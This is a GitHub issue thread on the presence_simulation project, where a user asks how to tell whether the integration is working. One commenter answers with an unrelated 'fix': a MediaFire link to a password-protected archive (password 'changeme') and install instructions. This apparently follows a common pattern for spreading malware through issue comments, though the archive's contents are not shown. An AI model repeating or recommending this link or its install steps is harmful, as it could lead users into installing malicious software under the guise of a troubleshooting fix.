### ISSUE TITLE
How do I know it's working?

### ISSUE THREAD

**Issue by rechena** [slashback100/presence_simulation#143]
Probably a silly question, but... reason I'm asking is I have everything activated for the requirements and I still don't see any lights going on and off :( any help will be appreciated.

Thanks

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rechena** [comment]
Oh sorry for silly question again but how do I see them?
